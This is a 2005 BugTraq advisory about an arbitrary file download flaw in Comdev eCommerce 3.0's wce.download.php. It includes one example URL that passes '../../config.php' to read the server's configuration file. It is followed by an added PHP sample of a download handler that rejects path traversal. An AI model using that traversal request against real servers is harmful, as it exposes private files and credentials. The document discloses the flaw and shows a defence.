BugTraq
Comdev eCommerce wce.download.php Download Vulnerability
Aug 05 2005 01:55AM
none none com
Class: Input Validation Error
Vulnerable: Comdev Comdev eCommerce 3.0
The wce.download.php script (present in two locations) can be passed a "download" HTTP request parameter to download an arbitrary file on the vulnerable server.
Example:
http://www.vulnerable.com/oneadmin/faqsupport/wce.download.php?download=../../config.php
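One way a download handler can refuse the "download" value shown in the post, as an added example that is not Comdev's code: resolve the requested name against a fixed base directory and serve it only if the canonical path stays inside that directory. The function name resolve_download, the directory layout and the sample files are assumptions constructed for the demonstration.

```php
<?php
// Added example, not Comdev's code. Function and directory names are hypothetical.

/**
 * Resolve a user-supplied "download" value to a file inside $baseDir,
 * or return null if it is empty, missing, or escapes that directory.
 */
function resolve_download(string $baseDir, string $requested): ?string
{
    // Reject empty values and NUL bytes before touching the filesystem.
    if ($requested === '' || strpos($requested, "\0") !== false) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // realpath() collapses "..", "." and symlinks; it returns false if the target does not exist.
    $target = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($target === false || !is_file($target)) {
        return null;
    }
    // Compare with a trailing separator so "/x/downloads-old" cannot pass for "/x/downloads".
    if (strncmp($target, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $target;
}

// Constructed layout: <tmp>/app/config.php and <tmp>/app/a/downloads/manual.txt
$root = sys_get_temp_dir() . '/dl_demo_' . bin2hex(random_bytes(4));
mkdir("$root/app/a/downloads", 0700, true);
file_put_contents("$root/app/config.php", "<?php // constructed placeholder\n");
file_put_contents("$root/app/a/downloads/manual.txt", "constructed sample\n");

// Constructed inputs: a legitimate name, the value from the post, a dotted form, a missing file.
foreach (['manual.txt', '../../config.php', './manual.txt', 'missing.txt'] as $value) {
    $path = resolve_download("$root/app/a/downloads", $value);
    printf("%-20s => %s\n", $value, $path === null ? 'rejected' : 'served: ' . basename($path));
}

// Remove the constructed files and directories.
unlink("$root/app/config.php");
unlink("$root/app/a/downloads/manual.txt");
foreach (["$root/app/a/downloads", "$root/app/a", "$root/app", $root] as $dir) {
    rmdir($dir);
}
```

In a real handler the returned path would be passed to readfile() only after this check succeeds; a lookup from an opaque file ID to a stored path avoids accepting file names from the request at all.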